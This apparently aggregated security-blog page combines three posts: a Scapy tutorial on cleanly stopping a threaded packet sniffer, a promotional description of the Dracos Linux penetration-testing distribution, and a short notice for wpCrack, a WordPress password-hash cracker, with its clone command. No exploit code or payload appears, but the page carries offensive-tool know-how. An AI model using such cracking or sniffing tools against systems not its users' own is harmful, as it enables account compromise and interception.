Scapy is an incredible tool when it comes to playing with the network. As it is written on its official website, Scapy can replace a majority of network tools such as nmap, hping and tcpdump. One of the features offered by Scapy is to sniff the network packets passing through a computer’s NIC. Below is a small example: from scapy.all import * interface = "eth0" def print_packet(packet): ip_layer = packet.getlayer(IP) print("[!] New Packet: {src} -> {dst}".format(src=ip_layer.src, dst=ip_layer.dst)) print("[*] Start sniffing...") sniff(iface=interface, filter="ip", prn=print_packet) print("[*] Stop sniffing") This little sniffer displays the source and the destination of all packets having an IP layer: $ sudo python3 sniff_main_thread.py [*] Start sniffing... [!] New Packet: 10.137.2.30 -> 10.137.2.1 [!] New Packet: 10.137.2.30 -> 10.137.2.1 [!] New Packet: 10.137.2.1 -> 10.137.2.30 [!] New Packet: 10.137.2.1 -> 10.137.2.30 [!] New Packet: 10.137.2.30 -> 216.58.198.68 [!] New Packet: 216.58.198.68 -> 10.137.2.30 [!] New Packet: 10.137.2.30 -> 216.58.198.68 [!] New Packet: 10.137.2.30 -> 216.58.198.68 [!] New Packet: 216.58.198.68 -> 10.137.2.30 [!] New Packet: 216.58.198.68 -> 10.137.2.30 [!] New Packet: 10.137.2.30 -> 216.58.198.68 [!] New Packet: 10.137.2.30 -> 216.58.198.68 [!] New Packet: 216.58.198.68 -> 10.137.2.30 [!] New Packet: 10.137.2.30 -> 216.58.198.68 ^C[*] Stop sniffing It will continue to sniff network packets until it receives a keyboard interruption (CTRL+C). Now, let’s look at a new example: from scapy.all import * from threading import Thread from time import sleep class Sniffer(Thread): def __init__(self, interface="eth0"): super().__init__() self.interface = interface def run(self): sniff(iface=self.interface, filter="ip", prn=self.print_packet) def print_packet(self, packet): ip_layer = packet.getlayer(IP) print("[!] New Packet: {src} -> {dst}".format(src=ip_layer.src, dst=ip_layer.dst)) sniffer = Sniffer() print("[*] Start sniffing...") sniffer.start() try: while True: sleep(100) except KeyboardInterrupt: print("[*] Stop sniffing") sniffer.join() This piece of code does exactly the same thing as the previous one except that this time the sniff function is executed inside a dedicated thread. Everything works well with this new version except when it comes to stopping the sniffer: $ sudo python3 sniff_thread_issue.py [*] Start sniffing... [!] New Packet: 10.137.2.30 -> 10.137.2.1 [!] New Packet: 10.137.2.30 -> 10.137.2.1 [!] New Packet: 10.137.2.1 -> 10.137.2.30 [!] New Packet: 10.137.2.1 -> 10.137.2.30 [!] New Packet: 10.137.2.30 -> 216.58.198.68 [!] New Packet: 216.58.198.68 -> 10.137.2.30 [!] New Packet: 10.137.2.30 -> 216.58.198.68 [!] New Packet: 10.137.2.30 -> 216.58.198.68 [!] New Packet: 216.58.198.68 -> 10.137.2.30 [!] New Packet: 216.58.198.68 -> 10.137.2.30 [!] New Packet: 10.137.2.30 -> 216.58.198.68 [!] New Packet: 10.137.2.30 -> 216.58.198.68 [!] New Packet: 216.58.198.68 -> 10.137.2.30 [!] New Packet: 10.137.2.30 -> 216.58.198.68 ^C[*] Stop sniffing ^CTraceback (most recent call last): File "sniff_thread_issue.py", line 25, in <module> sleep(100) KeyboardInterrupt During handling of the above exception, another exception occurred: Traceback (most recent call last): File "sniff_thread_issue.py", line 28, in <module> sniffer.join() File "/usr/lib/python3.5/threading.py", line 1054, in join self._wait_for_tstate_lock() File "/usr/lib/python3.5/threading.py", line 1070, in _wait_for_tstate_lock elif lock.acquire(block, timeout): KeyboardInterrupt ^CException ignored in: <module 'threading' from '/usr/lib/python3.5/threading.py'> Traceback (most recent call last): File "/usr/lib/python3.5/threading.py", line 1288, in _shutdown t.join() File "/usr/lib/python3.5/threading.py", line 1054, in join self._wait_for_tstate_lock() File "/usr/lib/python3.5/threading.py", line 1070, in _wait_for_tstate_lock elif lock.acquire(block, timeout): KeyboardInterrupt When CTRL+C is pressed, a SIGTERM signal is sent to the process executing the Python script, triggering its exit routine. However, as said in the official documentation about signals, only the main thread receives signals: As a result, when CTRL+C is pressed, only the main thread raises a KeyboardInterrupt exception. The sniffing thread will continue its infinite sniffing loop, blocking at the same time the call of sniffer.join(). So, how can the sniffing thread be stopped if not by signals? Let’s have a look at this next example: from scapy.all import * from threading import Thread, Event from time import sleep class Sniffer(Thread): def __init__(self, interface="eth0"): super().__init__() self.interface = interface self.stop_sniffer = Event() def run(self): sniff(iface=self.interface, filter="ip", prn=self.print_packet, stop_filter=self.should_stop_sniffer) def join(self, timeout=None): self.stop_sniffer.set() super().join(timeout) def should_stop_sniffer(self, packet): return self.stop_sniffer.isSet() def print_packet(self, packet): ip_layer = packet.getlayer(IP) print("[!] New Packet: {src} -> {dst}".format(src=ip_layer.src, dst=ip_layer.dst)) sniffer = Sniffer() print("[*] Start sniffing...") sniffer.start() try: while True: sleep(100) except KeyboardInterrupt: print("[*] Stop sniffing") sniffer.join() As you may have noticed, we are now using the stop_filter parameter in the sniff function call. This parameter expects to receive a function which will be called after each new packet to evaluate if the sniffer should continue its job or not. An Event object named stop_sniffer is used for that purpose. It is set to true when the join method is called to stop the thread. Is this the end of the story? Not really… $ sudo python3 sniff_thread_issue_2.py [*] Start sniffing... ^C[*] Stop sniffing [!] New Packet: 10.137.2.30 -> 10.137.2.1 One side effect remains. Because the should_stop_sniffer method is called only once after each new packet, if it returns false, the sniffer will continue its job, going back to its infinite sniffing loop. This is why the sniffer stopped one packet ahead of the keyboard interruption. A solution would be to force the sniffing thread to stop. As explained in the official documentation about threading, it is possible to flag a thread as a daemon thread for that purpose: However, even if this solution would work, the thread won’t release the resources it might hold: The sniff function uses a socket which is released just before exiting, after the sniffing loop: try: while sniff_sockets: // Sniffing loop except KeyboardInterrupt: pass if opened_socket is None: for s in sniff_sockets: s.close() return plist.PacketList(lst,"Sniffed") Therefore, the solution I suggest is to open the socket outside the sniff function and to give it to this last one as parameter. Consequently, it would be possible to force-stop the sniffing thread while closing its socket properly: from scapy.all import * from threading import Thread, Event from time import sleep class Sniffer(Thread): def __init__(self, interface="eth0"): super().__init__() self.daemon = True self.socket = None self.interface = interface self.stop_sniffer = Event() def run(self): self.socket = conf.L2listen( type=ETH_P_ALL, iface=self.interface, filter="ip" ) sniff( opened_socket=self.socket, prn=self.print_packet, stop_filter=self.should_stop_sniffer ) def join(self, timeout=None): self.stop_sniffer.set() super().join(timeout) def should_stop_sniffer(self, packet): return self.stop_sniffer.isSet() def print_packet(self, packet): ip_layer = packet.getlayer(IP) print("[!] New Packet: {src} -> {dst}".format(src=ip_layer.src, dst=ip_layer.dst)) sniffer = Sniffer() print("[*] Start sniffing...") sniffer.start() try: while True: sleep(100) except KeyboardInterrupt: print("[*] Stop sniffing") sniffer.join(2.0) if sniffer.isAlive(): sniffer.socket.close() Et voilà! The sniffing thread now waits for 2 seconds after having received a keyboard interrupt, letting the time to the sniff function to terminate its job by itself, after which the sniffing thread will be force-stopped and its socket properly closed from the main thread. Source

Dracos Linux ( www.dracos-linux.org ) is the Linux operating system from Indonesian , open source is built based on the Linux From Scratch under the protection of the GNU General Public License v3.0. This operating system is one variant of Linux distributions, which is used to perform security testing (penetration testing). Dracos linux in Arm by hundreds hydraulic pentest, forensics and reverse engineering. Does not use a GUI-based tools-tools and just have the software using the CLI (command line interface) to perform its operations. Now Dracos currently already up to version 2.0 with the code name "Leak". Screenshot Teaser As the target of development Education Dracos Linux is purposed as an educational,especially to recognize the operation system of linux and we respect ethical hacking. Build from source had always been built from codes instead of installer,this will stimulate users in indonesia to stay creative and to build the spirit of opensource. Repository even though proportionally based on codes,Dracos Linux still intends to construct the repository to build up the processes Like Venomizer Heavy Control We need to recognize this operating system Very Dificult Because Dracos in build from source code, thus forcing us to compile when installing a package or software, which of course will arise the possibility of system failure and other system vulnerabilities. Always from terminal None of every singel tool that was installed inside the OS uses GUI. CLI will always consider to particularly openbox to ease the users in need of multi terminal in applying Penetration Testing Penetration Tools List Link: http://dev.dracos-linux.org/projects/dracoslinux/wiki/Penetration_Testing Information Gathering Vulnerability Assessment Web Attack Exploitation Testing Privilege Escalation Password Attack Social Engineering Man In The Middle Attack Stress Testing Wireless Attack Maintaining Access Forensics Tools Reverse Engineering Malware Analysis Covering Track Download: https://dracos-linux.org/downloads.php Source

wpCrack v1.0 - version 1.0 Installation git clone https://github.com/MrSqar-Ye/wpCrack.git WordPress hash cracker Video Contact: Twitter : @MrSqar Send to my email Source